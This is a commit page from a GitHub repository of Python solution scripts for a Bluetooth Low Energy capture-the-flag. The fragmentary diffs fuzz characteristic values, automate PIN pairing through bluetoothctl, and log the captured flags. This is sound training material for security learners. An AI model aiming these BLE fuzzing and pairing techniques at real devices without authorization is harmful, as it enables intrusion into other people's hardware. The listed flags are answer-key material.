Fork: 0
0xRoM / BLE_CTF_V2
Browse code
tidying for public release
master
1 parent 5a615e2 commit c047d5983239f5f857c98b6dde3d78b48cc94bae
root authored on 11 Mar 2022
Patch
Unified Split
Showing 11 changed files
View
16
README.md
BLE_CTF_V2
===============
 
BLE CTF v2
BLE CTF v2 (Infinity)
 
https://github.com/hackgnar/ble_ctf_infinity
 
Thanks @hackgnar for this fun CTF
 
I decided I wanted to try to complete this using python, this repo contains my solutions.
View
46
level_04.py 100644 → 0
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
44 0x2C NOTIFY WRITE
46 0x2E READ WRITE write here to goto to scoreboard
'''
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID(0x00FF)
print ("Attached to peripheral")
 
print("Loading level 04")
hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
 
password = "AABBCCDDEEFF"
 
sys.stdout.write("\rTrying: %s " % password.rstrip())
response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
while True:
if p.waitForNotifications(1.0):
# handleNotification() was called
continue
print "Waiting..."
#hex1 = p.readCharacteristic(0x2C)
#hex2 = binascii.b2a_hex(hex1)
#hexlif2 = str(binascii.unhexlify(hex2))
class MyDelegate(btle.DefaultDelegate):
def __init__(self, params):
btle.DefaultDelegate.__init__(self)
# ... initialise here
 
def handleNotification(self, cHandle, data):
# ... perhaps check cHandle
# ... process 'data'
print("Data: "+data)
 
p.disconnect()
View
3
■■
 lvl_01.py
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ goodbye 👋
42 0x2A READ goodbye
 
fc3fd58dcdad9ab23fac
'''
 
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
 
p.disconnect()
View
1
■■■■
 lvl_02.py
print "Flag: %s" % hexlif2
break;
p.disconnect()
View
13
lvl_03.py
# !!! make sure bluetoothd runs in --compat mode before executing this script !!!
def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
"exectutes pairing with entered PIN on bluetooth adapter side"
try:
 
newpid = os.fork()
if newpid == 0:
time.sleep(5)
'''
Start bluepy stuff
'''
subprocess.call(['hciconfig','hci0','down'])
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
print ("Attached to peripheral")
print ("Attached to peripheral (pid 0)")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: "+hexlif2)
p.disconnect()
exit()
else:
'''
Start actual pair stuff
Start actual pair stuff
'''
subprocess.call(['hciconfig','hci0','sspmode', '0'])
# bluetoothctl
print("Pairing")
child = pexpect.spawn('bluetoothctl')
child.logfile = open("/tmp/mylog", "w")
child.expect("#")
child.sendline('agent off') # might be unnecessary
child.sendline('discoverable on')
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
child.sendline('scan on')
child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
 
child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
print ('Sending PIN: ' + pin)
trust_mac = 'trust ' + re.search(r'(?:[0-9a-fA-F]:?){12}.+$', child.before).group(0) # extract MAC from last line, one with 'Paired: Yes'
child.sendline(trust_mac) # optionally add device to trusted
child.expect('trust succeeded', timeout = 10)
pairing_status = True
child.sendline('remove 3c:71:bf:f1:ef:c6')
else: # i == 1
print('wrong PIN, retrying if time will allow')
except pexpect.EOF:
print ('!!!!!!!! EOF')
 
status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
if status == True:
print('Pairing successful')
View
3
■■
 lvl_04.py
hexstr = str(hex).strip("0").upper()
#sys.stdout.write(" Response: " + hexstr) # for debugging
if(password.strip("0") != hexstr):
print(" Flag: %s" % notificationData.rstrip())
print("\nFlag: %s" % notificationData.rstrip())
exit()
else:
gotResponse = True
continue
print "Waiting..."
finally:
p.disconnect()
View
5
lvl_07.py
child.sendline('discoverable on')
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
child.sendline('scan on')
child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
 
i = child.expect('Paired: yes', timeout = time_limit)
if i == 0: # found 'Paired: yes' == successful pairing
p = btle.Peripheral(deviceMAC)
print ("[bp] Attached to peripheral")
 
print("[++] Loading level 07")
hex1 = binascii.unhexlify(str('%0*x' % (4,3)))
hex1 = binascii.unhexlify(str('%0*x' % (4,7)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
 
p.disconnect()
 
hexlif2 = str(binascii.unhexlify(hex2))
print("[==] Flag: "+hexlif2)
p.disconnect()
exit()
View
11
lvl_08_incomplete.py 0 → 100644
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect
 
'''
View
11
lvl_09_incomplete.py 0 → 100644
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ Im advertising the flag
 
'''
View
8
notes.txt
Setup:
$> rfkill unblock all
$> btmgmt le on
$> systemctl start bluetooth
$> hciconfig hci0 up
$> hciconfig hci0 reset
$> hcitool lescan
Search for MAC addresses around:
hcitool lescan
enumerate the MAC
bleah -b 11:22:33:44:55:66 -e
View
65
solutions.txt 0 → 100644
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_00.py
Attached to peripheral
Sending "12345678901234567890" to 0x2e
Done
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_01.py
Attached to peripheral
Loading level 1
Reading value
Flag: eca7d1f3cf60a8b5344a
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_02.py
Attached to peripheral
Loading level 02
Password Found: password1234
Flag: eca7d1f3cf60a8b5344a
 
/***
* nano /etc/systemd/system/dbus-org.bluez.service
* set: ExecStart=/usr/lib/bluetooth/bluetoothd --compat
*/
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# systemctl daemon-reload
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# service bluetooth restart
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_03.py
Attached to peripheral
Loading level 03
Pairing
Attached to peripheral (pid 0)
Sending PIN: 0000
Flag: b46fa238cf820d0f60c1
Pairing successful
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_04.py
Attached to peripheral
Loading level 04
Generating wordlist
Trying: AABBC8DDEEFF
Flag: f401f21d02fdd0a4fc00
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_05.py
Attached to peripheral
Loading level 05
Sending "121212121222" to 0x2c
Reading value
Flag: 84cf61c35b2d9c92217d
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_06.py
Attached to peripheral
Loading level 06
Manufacturer: Cypress Semiconductor Corporation (305)
Device address: B8:27:EB:81:86:56 (Raspberry Pi Foundation)
New BD address: 11:22:33:44:55:66
Address changed - Reset device now
Reading value
Flag: 1dec0e624f2ecf1513dc
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_07.py
[bp] Attached to peripheral
[++] Loading level 07
[sp] starting bluetoothctl
[sp] Timeout
[sp] Pairing successful
[bp] Attached to peripheral
[==] Flag: a16ee1a4001c66c3a670
Buy Me A Coffee